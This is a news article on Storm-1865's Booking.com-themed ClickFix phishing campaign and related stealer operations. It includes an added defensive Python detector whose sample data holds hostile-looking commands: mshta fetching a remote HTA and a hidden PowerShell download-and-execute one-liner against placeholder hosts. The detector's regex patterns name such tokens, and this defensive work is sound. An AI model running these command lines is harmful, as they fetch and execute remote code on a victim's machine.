
Microsoft has shed light on an ongoing phishing campaign targeting the hospitality sector that impersonates the online travel agency Booking.com and uses an increasingly popular social engineering technique called ClickFix to deliver credential-stealing malware.
According to the tech giant, the activity began in December 2024 and is run with the end goal of carrying out financial fraud and theft. Microsoft is tracking the campaign under the moniker Storm-1865.
"This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern and Western Europe that are most likely to work with Booking.com, sending fake emails purporting to come from the agency," Microsoft said.
The ClickFix technique tricks users into running malware under the guise of fixing a supposed (i.e. non-existent) error: the victim is told to copy, paste and launch instructions that actually activate the infection process. It was first detected in the wild in October 2023.
The attack sequence begins with Storm-1865 sending a malicious email to the targeted individual, asking for "feedback" about negative reviews left by a guest on Booking.com. The message also includes a link, or a PDF attachment containing one, that purports to direct the recipient to the reservation site.

In reality, however, clicking on it leads the victim to a fake CAPTCHA verification page overlaid on a "subtly visible background designed to mimic a legitimate Booking.com page." The idea is to create a false sense of security and increase the likelihood of a successful compromise.
"The fake CAPTCHA is where the web page uses the ClickFix social engineering technique to download the malicious payload," Microsoft said. "This technique instructs the user to open a Windows Run window using a keyboard shortcut, then to paste and launch a command that the web page has added to the clipboard."
The command uses the legitimate mshta.exe binary to drop a variety of commodity malware families, including XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
Redmond said it had previously observed Storm-1865 targeting buyers on an e-commerce platform with phishing messages that led to fraudulent payment web pages. The incorporation of the ClickFix technique thus illustrates a tactical evolution designed to get past conventional security measures against phishing and malware.
"The threat actor Microsoft tracks as Storm-1865 encompasses a cluster of activity running phishing campaigns that lead to payment data theft and fraudulent charges."
"These campaigns have been ongoing with increased volume since at least early 2023 and include messages sent via vendor platforms, such as online travel agencies and e-commerce platforms, as well as email services such as Gmail and iCloud Mail."
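The Run-dialog step described above leaves two traces a responder can check: a process-creation event in which a living-off-the-land binary such as mshta.exe is spawned by explorer.exe (the parent of anything launched from Win+R) with a remote URL argument, and the Run dialog's own history in the RunMRU registry key. The following Python is an added example, not Microsoft's or the article's code. It scans constructed process-creation records with Sysmon Event ID 1 field names and parses a constructed .reg export of RunMRU; every hostname, URL and path in it is a placeholder, not an indicator from this campaign.

```python
"""Spot ClickFix-style execution in process telemetry and in the Run-dialog history.

Added example (not Microsoft's or the article's code). Two checks:
  1. analyze_event / find_clickfix_candidates: flag a LOLBIN such as mshta.exe
     launched from the Run dialog (parent explorer.exe) with a remote URL.
  2. parse_runmru / flag_runmru: read a .reg export of
     HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, where
     commands typed or pasted into Win+R are recorded.
All records, hostnames and URLs below are constructed placeholders.
"""
import re
from pathlib import PureWindowsPath

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
# Tokens typical of pasted one-liners: hidden window, bypassed policy, download-and-execute.
TOKEN_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|\biex\b"
    r"|invoke-expression|downloadstring|frombase64string", re.IGNORECASE)

# Constructed sample telemetry (field names as in Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example.invalid/verify.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",  # an installer using a local HTA: benign
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://example.invalid/x | iex"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

# Constructed .reg export of the Run dialog's MRU list; MRUList orders slots most recent first.
RUNMRU_SAMPLE = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="mshta https://example.invalid/verify.hta\\1"
"MRUList"="ba"
'''


def _basename(path):
    return PureWindowsPath(path).name.lower()


def analyze_event(event):
    """Return the reasons a process-creation record looks like ClickFix execution (empty if none)."""
    image, parent = _basename(event["Image"]), _basename(event["ParentImage"])
    cmdline = event["CommandLine"]
    if image not in LOLBINS:
        return []
    reasons = []
    url = URL_RE.search(cmdline)
    # Win+R hands the pasted command to explorer.exe, so "LOLBIN whose parent is
    # explorer.exe, with a remote URL argument" is exactly what the fake CAPTCHA asks for.
    if parent == "explorer.exe" and url:
        reasons.append(f"{image} started from the Run dialog with remote URL {url.group(0)}")
    if image == "mshta.exe" and url:
        reasons.append("mshta.exe fetching a remote HTA")
    tokens = TOKEN_RE.findall(cmdline)
    if tokens:
        reasons.append("suspicious tokens: " + ", ".join(t.lower() for t in tokens))
    return reasons


def find_clickfix_candidates(events):
    """Return [(index, reasons)] for every event that analyze_event flags."""
    return [(i, r) for i, ev in enumerate(events) if (r := analyze_event(ev))]


def parse_runmru(reg_text):
    """Parse a .reg export of RunMRU into the commands run, most recent first."""
    values = {}
    for line in reg_text.splitlines():
        m = re.match(r'^"([^"]+)"="(.*)"$', line.strip())
        if m:
            values[m.group(1)] = m.group(2).replace("\\\\", "\\")  # undo .reg escaping
    commands = []
    for slot in values.get("MRUList", ""):
        cmd = values.get(slot, "")
        commands.append(cmd[:-2] if cmd.endswith("\\1") else cmd)  # entries end in "\1"
    return commands


def flag_runmru(reg_text):
    """Return RunMRU commands that invoke a LOLBIN or reference a remote URL."""
    flagged = []
    for cmd in parse_runmru(reg_text):
        if not cmd:
            continue
        first = _basename(cmd.split()[0])
        if not first.endswith(".exe"):
            first += ".exe"  # Run accepts "mshta" as well as "mshta.exe"
        if first in LOLBINS or URL_RE.search(cmd):
            flagged.append(cmd)
    return flagged


if __name__ == "__main__":
    for idx, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(reasons))
    for cmd in flag_runmru(RUNMRU_SAMPLE):
        print("RunMRU: " + cmd)
```

Run stand-alone, the script flags the mshta.exe and PowerShell launches from explorer.exe and stays quiet on the installer that runs a local HTA from its own process, which is the false positive a bare "mshta.exe executed" rule would produce. The RunMRU check is useful after the fact on a host with no telemetry, since the pasted command survives there until the user clears the history. Where mshta.exe is not needed, blocking it with application control (AppLocker or WDAC) removes this particular execution path outright.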

Storm-1865 is just one of many campaigns that have embraced ClickFix as a malware distribution vector. Such is the effectiveness of the technique that even Russian and Iranian nation-state groups like APT28 and MuddyWater have adopted it to trick victims.
"This method in particular exploits human behavior. By presenting a plausible 'solution' to a perceived problem, attackers shift the burden of execution to the user, effectively bypassing many automated defenses," Group-IB said.
One such campaign, documented by the Singaporean cybersecurity company, uses ClickFix to drop a downloader named SmokeSaber that serves as a conduit for Lumma Stealer. Other campaigns have leveraged malvertising, SEO poisoning, GitHub issues, and forum and social media spam with links to ClickFix pages.
"The ClickFix technique demonstrates the evolution of adversarial social engineering tactics, leveraging user trust and browser functionality to deploy malware," Group-IB said. "The rapid adoption of this method by both cybercriminal and APT groups highlights its effectiveness and low technical barrier."
Some of the other documented ClickFix campaigns are listed below –
Lumma Stealer's diverse infection mechanisms are further exemplified by the discovery of another campaign that uses fake GitHub repositories featuring artificial intelligence (AI)-generated content to deliver the stealer via a loader called SmartLoader.

"These malicious repositories are disguised as non-malicious tools, such as game cheats, cracked software, and cryptocurrency utilities," Trend Micro said in an analysis published earlier this week. "This campaign lures victims with promises of free or illicit, unauthorized functionality and prompts them to download ZIP files (e.g. Release.zip, Software.zip)."
The operation highlights how threat actors abuse the trust associated with popular platforms like GitHub for malware propagation.

The findings come as Trustwave detailed an email phishing campaign that uses invoice-related lures to distribute an updated version of another stealer malware called StrelaStealer, assessing the activity to be operated by a single threat actor called Hive0145.
"The StrelaStealer sample includes custom multi-layer obfuscation and code-flow flattening to complicate its analysis," the company said. "It has been reported that the threat actor may be developing custom crypters used for 'Stellar Loader,' specifically for StrelaStealer."